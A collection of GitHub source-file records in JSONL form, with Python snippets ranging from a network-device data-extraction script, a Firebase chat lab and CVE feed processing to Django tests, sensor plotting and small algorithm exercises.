'''\r\n serverConfig=[]\r\n if filePath != None:\r\n self.confFile = filePath\r\n fd=open(self.confFile,'r')\r\n eof = False\r\n while True:\r\n poolList=[]\r\n for i in range(self.THREAD_POOL_SIZE):\r\n line=fd.readline()\r\n if(line.strip() == \"\"):\r\n eof = True\r\n break\r\n neList=line.split(',')\r\n neDetailsList=[]\r\n neDetailsList.append(neList[0].strip())\r\n if isApi:\r\n neDetailsList.append(USER_MCP)\r\n neDetailsList.append(PWD_MCP)\r\n elif '6200' in neList[1].strip():\r\n neDetailsList.append(self.USER_6200)\r\n neDetailsList.append(self.PWD_6200)\r\n elif neList[1].strip() in ['3930', '5160']:\r\n neDetailsList.append(USER_OTHERS)\r\n neDetailsList.append(PWD_OTHERS)\r\n neDetailsList.append(neList[1].strip())\r\n if len(neList) >= 3:\r\n neDetailsList.append(neList[2].strip())\r\n if len(neList) >= 4:\r\n neDetailsList.append(neList[3].strip())\r\n if len(neList) >= 5:\r\n neDetailsList.append(neList[4].strip())\r\n poolList.append(neDetailsList)\r\n if len(poolList)>0:\r\n serverConfig.append(poolList)\r\n if eof:\r\n break\r\n fd.close()\r\n print(str(serverConfig))\r\n return serverConfig\r\n\r\nprint('Starting TDM Service script')\r\nmyObj = snmpTrap()\r\nstartDate=str(datetime.now())\r\nconfFile = \"Test_6200.txt\"\r\nif len(sys.argv) > 1:\r\n confFile=sys.argv[1]\r\nmyObj.serverConfig=myObj.readConfig(confFile)\r\nmyObj.fetchData()\r\neDate=str(datetime.now())\r\nprint (\"start\",startDate)\r\nprint (\"end:\" , eDate)\r\nprint('Ending TDM Service script')\r\n","repo_name":"ArizAnsari1994/Data-Extration-Automation","sub_path":"TDMService.py","file_name":"TDMService.py","file_ext":"py","file_size_in_byte":16345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"32669849923","text":"# Fråga tills imon\n# Vad kommer finnas på tentan? Fokus på Labbarna eller Slides?\n# Lab11a, Lab10 och Lab8a har presenterats men inte betygsatts\n\n\nimport tkinter as tk\nimport tkinter.messagebox as tkmsgbox\nimport tkinter.scrolledtext as tksctxt\n\nimport firebase_admin\nfrom firebase_admin import db\n\nimport json\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n\n\n def create_widgets(self):\n \n #-------------------------------------------------------------------\n # row 1: connection stuff (and a clear-messages button)\n #-------------------------------------------------------------------\n self.groupName = tk.LabelFrame(bd=0)\n self.groupName.pack(side=\"top\")\n\n self.nameLbl = tk.Label(self.groupName, text=\"Name\", padx=10)\n self.nameLbl.pack(side=\"left\")\n\n self.nameIn = tk.Entry(self.groupName, width=20)\n self.nameIn.pack(side=\"left\")\n \n #-------------------------------------------------------------------\n # row 2: the message field (chat messages + status messages)\n #-------------------------------------------------------------------\n self.msgText = tksctxt.ScrolledText(height=15, width=42,\n state=tk.DISABLED)\n self.msgText.pack(side=\"top\")\n\n \n #-------------------------------------------------------------------\n # row 3: sending messages\n #-------------------------------------------------------------------\n self.groupSend = tk.LabelFrame(bd=0)\n self.groupSend.pack(side=\"top\")\n #\n self.textInLbl = tk.Label(self.groupSend, text='message', padx=10)\n self.textInLbl.pack(side=\"left\")\n #\n self.textIn = tk.Entry(self.groupSend, width=38)\n # if the focus is on this text field and you hit 'Enter',\n # it should (try to) send\n self.textIn.bind('', sendMessage)\n self.textIn.pack(side=\"left\")\n #\n padder = tk.Label(self.groupSend, padx=5)\n padder.pack(side=\"left\")\n #\n self.sendButton = tk.Button(self.groupSend, text = 'send',\n command = sendButtonClick)\n self.sendButton.pack(side=\"left\")\n\ndef sendButtonClick():\n # forward to the sendMessage method\n sendMessage(g_app)\n\n# a utility method to print to the message field \ndef printToMessages(message):\n g_app.msgText.configure(state=tk.NORMAL)\n g_app.msgText.insert(tk.END, message + '\\n')\n # scroll to the end, so the new message is visible at the bottom\n g_app.msgText.see(tk.END)\n g_app.msgText.configure(state=tk.DISABLED)\n\n# if attempt to close the window, it is handled here\ndef on_closing():\n if tkmsgbox.askokcancel(\"Quit\",\n \"You are still connected. If you quit you will be\"\n + \" disconnected.\"):\n g_root.destroy()\n\n# attempt to send the message (in the text field g_app.textIn) to the server\ndef sendMessage(master):\n message = g_app.textIn.get()\n user = g_app.nameIn.get()\n \n global ref\n newMessage = { 'text' : message, 'user' : user}\n ref.child('messages').push(newMessage)\n\n\ndef handleMessage(message):\n printToMessages(f\"{message['user']} : {message['text']}\")\n \n\ndef streamHandler(incomingData):\n if incomingData.event_type == 'put':\n if incomingData.path == '/':\n # This is the very first reading just after subscription:\n # we get all messages or None (if no messages exists).\n if incomingData.data != None:\n for key in incomingData.data:\n message = incomingData.data[key]\n handleMessage(message)\n else:\n # Not the first reading.\n # Someone wrote a new message that we just got.\n message = incomingData.data\n handleMessage(message)\n\ndatabaseURL = \"https://lab12-accd6-default-rtdb.europe-west1.firebasedatabase.app/\"\n\ncred = firebase_admin.credentials.Certificate(\"lab12.json\")\nfirebase_admin.initialize_app(cred, {\"databaseURL\": databaseURL})\nref = firebase_admin.db.reference(\"/\")\n\nnewMessage = {'name' : 'Mikael', 'text' : \"Hello again on december 7th, wow.\"}\n\ng_listenToFirebaseStream = True\n\ng_root = tk.Tk()\ng_app = Application(g_root)\n\n# Start listen to stream\nref.child('messages').listen(streamHandler)\n\n# if attempt to close the window, handle it in the on-closing method\ng_root.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n# start the main loop\n# (which handles the gui and will frequently call pollMessages)\ng_app.mainloop()\n","repo_name":"sifudiep/netproglabs","sub_path":"lab12/lab12.py","file_name":"lab12.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"21338711810","text":"from collections import defaultdict as dd\n\ndef primes(x):\n N = int(X ** 0.5) + 10\n sieve = [True] * N\n sieve[0] = False\n sieve[1] = False\n for i in range(2, N):\n for j in range(i * i, N,i):\n sieve[j] = False \n cnt = 0\n left = x\n for i in range(2, min(N, x)):\n if sieve[i]:\n c = i\n while x % c == 0:\n cnt += 1\n left /= i\n c*= i\n if left > 1:\n cnt += 1\n return max(cnt,1)\n\nX= int(raw_input())\nk =primes(X)\n\nprint(k)","repo_name":"majstenmark/kattis","sub_path":"alistgame.py","file_name":"alistgame.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72857814607","text":"\"\"\"Run CVEjob.\"\"\"\n\nimport sys\nfrom decimal import Decimal\nimport multiprocessing\n\nimport nvdlib\nfrom nvdlib.manager import FeedManager\nfrom nvdlib.query_selectors import in_range\n\nfrom cvejob.filters.input import validate_cve\nfrom cvejob.config import Config\nfrom cvejob.identifiers import get_identifier_cls\nfrom cvejob.cpe2pkg import get_pkgfile_path, PackageNameCandidate\nfrom cvejob.selectors.basic import VersionSelector\nfrom cvejob.outputs.victims import VictimsYamlOutput\nfrom cvejob.versions import NVDVersions\nfrom cvejob.utils import parse_date_range\n\nimport logging\n\n\n# logging configuration\nlogging.basicConfig(level=logging.DEBUG,\n handlers=[nvdlib.get_logging_handler()]) # use nvdlib's handler\n\nlogger = logging.getLogger('cvejob')\n\n\nFEED_NAME_PATTERN = r\"nvdcve-\" \\\n r\"(?P[\\d.]+)-\" \\\n r\"(?P(?P(([A-Za-z]+)))|(?P([\\d]+)))\" \\\n r\".json\"\n\n\ndef _log_results(victims_output):\n \"\"\"Log results.\"\"\"\n cve_id = victims_output.cve.id_\n\n logger.info(\n \"[{cve_id}] picked `{winner}` out of `{candidates}`\".format(\n cve_id=cve_id,\n winner=victims_output.winner,\n candidates=victims_output.candidates\n ))\n\n logger.info(\n \"[{cve_id}] Affected version range: {version_ranges}\".format(\n cve_id=cve_id,\n version_ranges=victims_output.affected_versions\n ))\n\n logger.info(\n \"[{cve_id}] Safe version range: {version_ranges}\".format(\n cve_id=cve_id,\n version_ranges=victims_output.safe_versions\n ))\n\n\ndef _filter_collection(collection, date_range, cherry_pick):\n \"\"\"Filter Document collection.\"\"\"\n if date_range:\n collection_size_before = collection.count()\n\n collection = collection.find(\n {'published_date': in_range(*date_range)}\n )\n\n logger.debug((\"Filtered out {} Documents that do not fall \"\n \"in the given range.\").format(\n collection_size_before - collection.count()\n ))\n\n if cherry_pick:\n\n logger.debug(\"Cherry-picked CVE `{cve_id}`\".format(\n cve_id=cherry_pick\n ))\n collection = collection.find(\n {'cve.id_': cherry_pick}\n )\n\n return collection\n\n\ndef run():\n \"\"\"Run CVEjob.\"\"\"\n feed_dir = Config.feed_dir\n feed_names = Config.feed_names\n date_range = Config.date_range\n\n cherrypicked_cve_id = Config.cve_id\n cherrypicked_year = None\n\n if cherrypicked_cve_id:\n cherrypicked_year = cherrypicked_cve_id.split(sep='-')[1]\n\n if int(cherrypicked_year) < 2002:\n # all CVEs prior to 2002 are stored in 2002 feed\n cherrypicked_year = 2002\n\n if date_range:\n date_range = parse_date_range(Config.date_range)\n\n feed_names = range(date_range[0].year, date_range[1].year + 1)\n\n if cherrypicked_cve_id: # optimization check\n\n if int(cherrypicked_year) not in feed_names:\n logger.info(\n \"[{picked_cve_id}] does not belong to the given feed range:\"\n \" {date_range}\".format(\n picked_cve_id=cherrypicked_cve_id,\n date_range=date_range\n ))\n\n return\n\n # prune the feed names as it is not necessary to iterate over all of them\n feed_names = [cherrypicked_year]\n\n if not feed_names:\n\n if cherrypicked_cve_id:\n feed_names = [cherrypicked_year]\n else:\n feed_names = ['modified']\n\n with FeedManager(n_workers=multiprocessing.cpu_count()) as feed_manager:\n\n feeds = feed_manager.fetch_feeds(\n feed_names=feed_names, data_dir=feed_dir, update=True\n )\n collection = feed_manager.collect(feeds)\n collection = _filter_collection(collection,\n date_range,\n cherrypicked_cve_id)\n\n if not collection: # collection is empty\n logger.info(\n \"Collection is empty [{picked_cve_id}].\".format(\n picked_cve_id=cherrypicked_cve_id,\n ))\n\n return\n\n logger.debug(\"Number of CVE Documents in the collection: {}\".format(\n collection.count()\n ))\n\n if Config.package_name and Config.cve_id:\n # user knows the package name, so we don't have to guess ;)\n doc = [x for x in collection][0] # Collection doesn't support indexing\n affected, safe = NVDVersions(doc, Config.package_name, Config.ecosystem).run()\n victims_output = VictimsYamlOutput(\n ecosystem=Config.ecosystem,\n cve_doc=doc,\n winner=PackageNameCandidate(Config.package_name, Decimal('1.0')),\n candidates=[],\n affected=affected,\n fixedin=safe\n )\n _log_results(victims_output)\n victims_output.write()\n sys.exit(0)\n\n for doc in collection:\n\n cve_id = doc.cve.id_\n\n try:\n\n if not validate_cve(doc):\n logger.debug(\n \"[{cve_id}] was filtered out by input checks\".format(\n cve_id=cve_id\n ))\n continue\n\n pkgfile_path = get_pkgfile_path(Config.pkgfile_dir, Config.ecosystem)\n identifier = get_identifier_cls()(doc, Config.ecosystem, pkgfile_path)\n candidates = identifier.identify()\n\n if not candidates:\n logger.info(\n \"[{cve_id}] no package name candidates found\".format(\n cve_id=cve_id\n ))\n continue\n\n selector = VersionSelector(doc, candidates, Config.ecosystem)\n winner = selector.pick_winner()\n\n if not winner:\n logger.info(\n \"[{cve_id}] no package name found\".format(\n cve_id=cve_id\n ))\n\n continue\n\n affected, safe = NVDVersions(doc, winner.package, Config.ecosystem).run()\n\n victims_output = VictimsYamlOutput(\n ecosystem=Config.ecosystem,\n cve_doc=doc,\n winner=winner,\n candidates=candidates,\n affected=affected,\n fixedin=safe\n )\n\n _log_results(victims_output)\n\n victims_output.write()\n\n except Exception as exc:\n\n logger.warning(\n \"[{cve_id}] Unexpected exception occurred: {exc}\".format(\n cve_id=cve_id,\n exc=exc\n ), exc_info=True)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"fabric8-analytics/cvejob","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6782,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"65"} +{"seq_id":"26672693985","text":"import argparse\nimport requests\nimport datetime\nimport xml.etree.ElementTree as ET\n\n\ndef get_currency_rate(code, date):\n try:\n input_date = datetime.datetime.strptime(date, '%Y-%m-%d').date()\n\n except ValueError:\n print('Введите корректную дату!')\n return\n\n if input_date > datetime.date.today():\n print('Введите дату до сегодняшнего дня!')\n return\n\n url_date = input_date.strftime('%d-%m-%Y')\n url = f'https://www.cbr.ru/scripts/XML_daily.asp?date_req={url_date}'\n\n response = requests.get(url)\n\n if response.status_code != 200:\n print('Ошибка при получении курсов валют!')\n return\n\n xml_data = response.text\n root = ET.fromstring(xml_data)\n valute_element = root.find(f'.//Valute[CharCode=\"{code.upper()}\"]')\n\n if valute_element is None:\n print(f'Валюта с кодом {code} не найдена')\n return\n\n value_element = valute_element.find('Value')\n value = value_element.text\n\n name_element = valute_element.find('Name')\n name = name_element.text\n\n print(f'{code} ({name}): {value}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Вывод курса валюты ЦБ РФ за определенную дату')\n parser.add_argument('--code', type=str,\n help='Код валюты в формате ISO 4217')\n parser.add_argument('--date', type=str, help='Дата в формате YYYY-MM-DD')\n\n args = parser.parse_args()\n\n if args.code is None or args.date is None:\n parser.print_help()\n else:\n get_currency_rate(args.code, args.date)\n","repo_name":"paych3ck/CurrencyRates","sub_path":"console/currency_rates.py","file_name":"currency_rates.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"6975715049","text":"from django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom app.errors import InvalidTransactionError\nfrom app.models import Item, Listing, Wallet, InventoryItem\n\n\nclass ListingTests(TestCase):\n def setUp(self):\n self.item = Item.objects.create(name='sword')\n self.user = User.objects.create_user(username='ben', password='abc')\n\n def test_process_purchase_invalid(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.BUY,\n submitter=self.user)\n with self.assertRaises(InvalidTransactionError):\n listing.process_purchase(5)\n\n def test_process_purchase_too_many_items(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.SELL,\n submitter=self.user)\n with self.assertRaises(ValueError):\n listing.process_purchase(10)\n\n def test_process_purchase_updates_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.SELL,\n submitter=self.user)\n listing.process_purchase(1)\n listing.refresh_from_db()\n self.assertEqual(4, listing.count)\n\n def test_process_purchase_deletes_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, direction=Listing.Direction.SELL,\n submitter=self.user)\n listing.process_purchase(5)\n self.assertEqual(0, Listing.objects.all().count())\n\n\nclass CancelListingTests(TestCase):\n def setUp(self):\n self.item = Item.objects.create(name='sword')\n self.user = User.objects.create_user(username='ben', password='abc')\n\n def test_cancel_buy_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, submitter=self.user,\n direction=Listing.Direction.BUY)\n listing.cancel()\n self.assertEqual(0, Listing.objects.count())\n self.assertEqual(50, Wallet.get_users_wallet(self.user).coins)\n self.assertEqual(0, InventoryItem.objects.count())\n\n def test_cancel_sell_listing(self):\n listing = Listing.objects.create(item=self.item, count=5, price=10, submitter=self.user,\n direction=Listing.Direction.SELL)\n listing.cancel()\n self.assertEqual(0, Listing.objects.count())\n self.assertEqual(0, Wallet.get_users_wallet(self.user).coins)\n self.assertEqual(5, InventoryItem.objects.get(user=self.user, item=self.item).count)\n","repo_name":"micossow/auction-house","sub_path":"app/tests/test_listing.py","file_name":"test_listing.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"2336325783","text":"from concurrent.futures import process\nfrom pathlib import Path\nimport os\nimport os\nimport glob\nimport gin\n\nimport numpy as np\nimport tensorflow as tf\nimport subprocess\nfrom ddsp.training.data_preparation.prepare_tfrecord_lib import prepare_tfrecord\nfrom ddsp.colab import colab_utils\nfrom ddsp.colab.colab_utils import play, specplot\n\nfrom matplotlib import pyplot as plt\n\n# Check for project path\nPROJECT_PATH = Path('.').resolve()\nprint(\"PROJECT_PATH:\", PROJECT_PATH)\n\nif not PROJECT_PATH.exists():\n raise Exception(f'Project path {PROJECT_PATH} does not exist')\n\n# Check if separated data exists\nTRAINING_DATASET_PATH = f\"{str(PROJECT_PATH)}/training_data\"\nif not Path(TRAINING_DATASET_PATH).exists():\n raise Exception(\n f\"Training dataset path not found at '{TRAINING_DATASET_PATH}'\")\n\n# Check for checkpoints path\nCHECKPOINTS_PATH = f\"{str(PROJECT_PATH)}/checkpoints\"\nif not Path(CHECKPOINTS_PATH).exists():\n os.mkdir(CHECKPOINTS_PATH)\n assert Path(CHECKPOINTS_PATH).exists()\n\n# Check for gins path\nGINS_PATH = f\"{str(PROJECT_PATH)}/gins\"\nif not Path(GINS_PATH).exists():\n raise Exception(f\"Gins path not found at '{GINS_PATH}'\")\n\n# Environment variables:\nSAMPLE_RATE = 16000\nFRAME_RATE = 250\n\n\ndef train(relative_path, gin_file=\"singing_default.gin\", save_tag=None):\n dataset_pattern = f\"{TRAINING_DATASET_PATH}/{str(relative_path)}/*\"\n\n if not Path(dataset_pattern[:-2]).exists():\n raise Exception(\n f\"The dataset path {dataset_pattern[:-2]} doesn't exist\")\n\n gin_file_path = f\"{GINS_PATH}/{gin_file}\"\n\n # Make custom save path\n if save_tag is None:\n save_path = f\"{CHECKPOINTS_PATH}/{relative_path}\"\n else:\n save_path = f\"{CHECKPOINTS_PATH}/{save_tag}\"\n\n if not Path(save_path).exists():\n os.mkdir(save_path)\n assert Path(save_path).exists()\n\n # Load gin config\n gin.parse_config_file(gin_file_path)\n\n prepare_tfrecord()\n\n\ndef train_multiple(relative_path, n_pairs):\n for pair in n_pairs:\n save_tag = f\"{relative_path}_h{pair[0]}_n{pair[1]}\"\n print(f\"Training {save_tag}\")\n train(relative_path, \"z.gin\", save_tag=save_tag)\n\n\nif __name__ == \"__main__\":\n pairs = [\n (20, 10),\n (20, 30),\n (20, 60),\n (20, 80),\n (60, 10),\n (60, 30),\n (60, 60),\n (60, 80),\n (100, 10),\n (100, 30),\n (100, 60),\n (100, 80),\n ]\n\n train_multiple(\"ColdplaySelected\", pairs)\n","repo_name":"harrytwigg/FEEG3003","sub_path":"vocal_ddsp/vocaliser/scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"10104607310","text":"import math\nimport numpy as np\nfrom sailboat_playground.constants import constants\n\n\ndef compute_angle(vec: np.ndarray):\n try:\n assert vec.shape == (2,)\n except AssertionError:\n raise AssertionError(\n f\"Failed to compute angle on vector with shape different from (2,): Shape is {vec.shape}\")\n ang = math.atan2(vec[1], vec[0])\n while ang < 0:\n ang += 2 * np.pi\n while ang > 2 * np.pi:\n ang -= 2 * np.pi\n return ang\n\n\ndef norm_to_vector(norm: float, angle_rad: float):\n return np.array([np.cos(angle_rad), np.sin(angle_rad)]) * norm\n","repo_name":"gabriel-milan/sailboat-playground","sub_path":"sailboat_playground/engine/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"65"} +{"seq_id":"44808829934","text":"from itertools import *\nimport torch\nfrom allennlp.nn import util\nfrom allennlp.nn.util import min_value_of_dtype, replace_masked_values\nfrom functools import lru_cache\n\n\n@lru_cache(maxsize=128)\ndef compute_op_idx(batch_size, seq_len, binary_op_count, unary_op_count, device):\n binary_op_ids = torch.arange(\n binary_op_count, dtype=torch.int64, device=device\n ).expand([batch_size, seq_len ** 2, binary_op_count])\n unary_op_ids = (\n torch.arange(unary_op_count, dtype=torch.int64, device=device) + binary_op_count\n ).expand([batch_size, seq_len, unary_op_count])\n\n frontier_op_ids = torch.cat(\n [\n binary_op_ids.reshape([batch_size, -1]),\n unary_op_ids.reshape([batch_size, -1]),\n ],\n dim=-1,\n )\n return frontier_op_ids\n\n\n@lru_cache(maxsize=128)\ndef compute_beam_idx(batch_size, seq_len, binary_op_count, unary_op_count, device):\n binary_beam_idx = (\n torch.arange(seq_len ** 2, device=device)\n .unsqueeze(0)\n .unsqueeze(-1)\n .expand([batch_size, seq_len ** 2, binary_op_count])\n .reshape([batch_size, -1])\n )\n l_binary_beam_idx = binary_beam_idx // seq_len\n r_binary_beam_idx = binary_beam_idx % seq_len\n unary_beam_idx = (\n torch.arange(seq_len, device=device)\n .unsqueeze(0)\n .unsqueeze(-1)\n .expand([batch_size, seq_len, unary_op_count])\n .reshape([batch_size, -1])\n )\n l_beam_idx = torch.cat([l_binary_beam_idx, unary_beam_idx], dim=-1)\n r_beam_idx = torch.cat([r_binary_beam_idx, unary_beam_idx], dim=-1)\n return l_beam_idx, r_beam_idx\n\n\ndef batched_span_select(target: torch.Tensor, spans: torch.LongTensor) -> torch.Tensor:\n \"\"\"\n The given `spans` of size `(batch_size, num_spans, 2)` indexes into the sequence\n dimension (dimension 2) of the target, which has size `(batch_size, sequence_length,\n embedding_size)`.\n This function returns segmented spans in the target with respect to the provided span indices.\n It does not guarantee element order within each span.\n # Parameters\n target : `torch.Tensor`, required.\n A 3 dimensional tensor of shape (batch_size, sequence_length, embedding_size).\n This is the tensor to be indexed.\n indices : `torch.LongTensor`\n A 3 dimensional tensor of shape (batch_size, num_spans, 2) representing start and end\n indices (both inclusive) into the `sequence_length` dimension of the `target` tensor.\n # Returns\n span_embeddings : `torch.Tensor`\n A tensor with shape (batch_size, num_spans, max_batch_span_width, embedding_size]\n representing the embedded spans extracted from the batch flattened target tensor.\n span_mask: `torch.BoolTensor`\n A tensor with shape (batch_size, num_spans, max_batch_span_width) representing the mask on\n the returned span embeddings.\n \"\"\"\n # both of shape (batch_size, num_spans, 1)\n span_starts, span_ends = spans.split(1, dim=-1)\n\n # shape (batch_size, num_spans, 1)\n # These span widths are off by 1, because the span ends are `inclusive`.\n span_widths = span_ends - span_starts\n\n # We need to know the maximum span width so we can\n # generate indices to extract the spans from the sequence tensor.\n # These indices will then get masked below, such that if the length\n # of a given span is smaller than the max, the rest of the values\n # are masked.\n max_batch_span_width = span_widths.max().item() + 1\n\n # Shape: (1, 1, max_batch_span_width)\n max_span_range_indices = util.get_range_vector(\n max_batch_span_width, util.get_device_of(target)\n ).view(1, 1, -1)\n # print(max_batch_span_width)\n # print(max_span_range_indices)\n # Shape: (batch_size, num_spans, max_batch_span_width)\n # This is a broadcasted comparison - for each span we are considering,\n # we are creating a range vector of size max_span_width, but masking values\n # which are greater than the actual length of the span.\n #\n # We're using <= here (and for the mask below) because the span ends are\n # inclusive, so we want to include indices which are equal to span_widths rather\n # than using it as a non-inclusive upper bound.\n span_mask = max_span_range_indices <= span_widths\n # raw_span_indices = span_ends - max_span_range_indices\n raw_span_indices = span_starts + max_span_range_indices\n # print(raw_span_indices)\n # print(target.size())\n # We also don't want to include span indices which are less than zero,\n # which happens because some spans near the beginning of the sequence\n # have an end index < max_batch_span_width, so we add this to the mask here.\n span_mask = span_mask & (raw_span_indices < target.size(1))\n # print(span_mask)\n # span_indices = torch.nn.functional.relu(raw_span_indices.float()).long()\n span_indices = raw_span_indices * span_mask\n # print(span_indices)\n\n # Shape: (batch_size, num_spans, max_batch_span_width, embedding_dim)\n span_embeddings = util.batched_index_select(target, span_indices)\n\n return span_embeddings, span_mask\n\n\ndef shuffle(t):\n idx = torch.randperm(t.nelement())\n return t.view(-1)[idx].view(t.size())\n\n\ndef isin(key, query):\n key, _ = key.sort()\n a = torch.searchsorted(key, query, right=True)\n b = torch.searchsorted(key, query, right=False)\n return (a != b).float()\n\n\ndef replace_masked_values_with_big_negative_number(x: torch.Tensor, mask: torch.Tensor):\n \"\"\"\n Replace the masked values in a tensor something really negative so that they won't\n affect a max operation.\n \"\"\"\n return replace_masked_values(x, mask, min_value_of_dtype(x.dtype))\n\n\ndef get_span_scores(\n span_start_logits: torch.Tensor, span_end_logits: torch.Tensor\n) -> torch.Tensor:\n \"\"\"\n This acts the same as the static method ``BidirectionalAttentionFlow.get_best_span()``\n in ``allennlp/models/reading_comprehension/bidaf.py``. We keep it here so that users can\n directly import this function without the class.\n We call the inputs \"logits\" - they could either be unnormalized logits or normalized log\n probabilities. A log_softmax operation is a constant shifting of the entire logit\n vector, so taking an argmax over either one gives the same result.\n \"\"\"\n if span_start_logits.dim() != 2 or span_end_logits.dim() != 2:\n raise ValueError(\"Input shapes must be (batch_size, passage_length)\")\n batch_size, passage_length = span_start_logits.size()\n device = span_start_logits.device\n # (batch_size, passage_length, passage_length)\n span_log_probs = span_start_logits.unsqueeze(2) + span_end_logits.unsqueeze(1)\n # Only the upper triangle of the span matrix is valid; the lower triangle has entries where\n # the span ends before it starts.\n span_log_mask = torch.triu(\n torch.ones((passage_length, passage_length), device=device)\n ).log()\n valid_span_log_probs = span_log_probs + span_log_mask\n\n # Here we take the span matrix and flatten it, then find the best span using argmax. We\n # can recover the start and end indices from this flattened list using simple modular\n # arithmetic.\n # (batch_size, passage_length * passage_length)\n # best_spans = valid_span_log_probs.view(batch_size, -1).argmax(-1)\n # span_start_indices = best_spans // passage_length\n # span_end_indices = best_spans % passage_length\n # return torch.stack([span_start_indices, span_end_indices], dim=-1)\n return valid_span_log_probs\n","repo_name":"OhadRubin/SmBop","sub_path":"smbop/utils/vec_utils.py","file_name":"vec_utils.py","file_ext":"py","file_size_in_byte":7557,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"65"} +{"seq_id":"35310614852","text":"import sys\nfrom collections import Counter\n\ntry:\n num_words = int(sys.argv[1])\nexcept:\n print(\"Usage: python most_common_words.py num_words\")\n sys.exit(1)\n\ncounter = Counter([word.lower() for line in sys.stdin\n for word in line.strip().split()])\n\nfor word, count in counter.most_common(num_words):\n sys.stdout.write(f\"{word}: {count} \\n\")\n","repo_name":"starsinmypockets/python_machine_learning","sub_path":"data_science_from_scratch/common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"70194701326","text":"#Test program for MLX90640 class, uses matplotlib for plotting temperatures\n#Based on example from https://matplotlib.org/stable/gallery/animation/animation_demo.html\n#UBC PHAS E-lab, Nov 2022\n#Required Packages:\n#pyserial\n#matplotlib\n\n\n\nfrom MLX90640 import MLX90640\nimport matplotlib\nmatplotlib.use('Tkagg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#MLX Framerate values 0-7 are 0.5-64Hz\n#0 = 0.5Hz\n#1 = 1Hz\n#2 = 2Hz\n#3 = 4Hz\n#4 = 8Hz\n#5 = 16Hz\n#6 = 32Hz\n#7 = 64Hz\nsensor = MLX90640(port=\"COM5\", baud=115200, framerate=3)#Actual com port name will depend on system\n\nfig, ax = plt.subplots()\nplt.inferno()\nloop = 0\ntry:\n while True:\n #Calculate temperature values from MLX RAM\n floatarray = [[sensor.getCompensatedPixDataRAM(i+1,j+1) for i in range(24)] for j in range(32)]\n cmap = ax.imshow(floatarray) #Show the image\n ax.set_title(\"Temperature Map\")\n cb = fig.colorbar(cmap, ax = ax) #Show a colorbar\n plt.pause(0.001)\n sensor.updateRAM() #get copy new of RAM from MLX90640\n loop = loop + 1\n print(loop)\n cb.remove() #remove old plots\n ax.cla() \nfinally:\n sensor.close()\n","repo_name":"chsyan/IR-Camera","sub_path":"MLXtest Matplotlib.py","file_name":"MLXtest Matplotlib.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"71512273808","text":"graph = {\n 1: [2, 3, 4],\n 2: [5],\n 3: [5],\n 4: [],\n 5: [6, 7],\n 6: [],\n 7: [3],\n}\n\n\ndef recursive_dfs(v: int, discovered: list[int] = []) -> list[int]:\n discovered.append(v)\n for w in graph[v]:\n if w not in discovered:\n discovered = recursive_dfs(w, discovered)\n return discovered\n\n\ndef iterative_dfs(start_v: int):\n discovered = []\n stack = [start_v]\n while stack:\n v = stack.pop()\n if v not in discovered:\n discovered.append(v)\n stack.extend(graph[v])\n return discovered\n\n\nif __name__ == '__main__':\n print(f'recursive dfs: {recursive_dfs(1)}')\n print(f'iterative dfs: {iterative_dfs(1)}')\n","repo_name":"flynnpark/leetcode-py","sub_path":"dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"22305067341","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import patches\nimport warnings\nwarnings.simplefilter(action = 'ignore', category=FutureWarning) #Futurewarning 제거\n\ntrain = pd.read_csv('data/train.csv')\n\n# 데이터 기초 확인 작업\n#print(train.head())\nprint(train.shape)\n\n#결측치 확인\n#결측치란, (NA : Not Avaialable) 값이 누락된 데이터를 말한다.\n#정확한 분석을 위해서는 데이터 결측치를 확인하고 적절히 잘라서 처리해 주어야 한다.\ndef check_missing_col(dataframe):\n missing_col = []\n for col in dataframe.columns:\n missing_values = sum(dataframe[col].isna())\n is_missing = True if missing_values >= 1 else False\n if is_missing:\n print(f'결측치가 있는 컬럼은: {col} 입니다')\n print(f'해당 컬럼에 총 {missing_values} 개의 결측치가 존재합니다.')\n missing_col.append([col, dataframe[col].dtype])\n if missing_col == []:\n print('결측치가 존재하지 않습니다')\n return missing_col\n\nmissing_col = 